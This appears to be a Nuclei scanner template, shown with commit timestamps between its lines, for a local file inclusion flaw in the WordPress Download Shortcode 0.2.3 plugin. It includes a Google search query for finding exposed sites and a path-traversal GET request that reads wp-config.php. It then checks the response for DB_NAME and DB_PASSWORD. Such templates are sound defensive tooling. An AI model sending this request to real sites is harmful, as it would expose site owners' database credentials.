2022-02-12 17:00:51 +00:00
id : shortcode-lfi
info :
2022-07-29 14:04:23 +00:00
name : WordPress Download Shortcode 0.2.3 - Local File Inclusion
2022-02-12 17:00:51 +00:00
author : dhiyaneshDK
severity : high
2022-07-29 14:04:23 +00:00
description : WordPress Download Shortcode 0.2.3 is prone to a local file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. Prior versions may also be affected.
2022-04-22 10:38:41 +00:00
reference :
- https://packetstormsecurity.com/files/128024/WordPress-ShortCode-1.1-Local-File-Inclusion.html
2022-02-15 11:18:20 +00:00
metadata :
2022-09-08 22:39:14 +00:00
google-query : inurl:wp/wp-content/force-download.php
2022-07-29 14:04:23 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : lfi,shortcode,wp,packetstorm,wordpress,wp-plugin
2022-02-12 17:00:51 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/wp-content/force-download.php?file=../wp-config.php'
matchers-condition : and
matchers :
- type : word
2022-02-15 11:18:20 +00:00
part : body
2022-02-12 17:00:51 +00:00
words :
- "DB_NAME"
- "DB_PASSWORD"
condition : and
- type : status
status :
- 200
2022-07-29 14:04:23 +00:00
# Enhanced by mp on 2022/07/29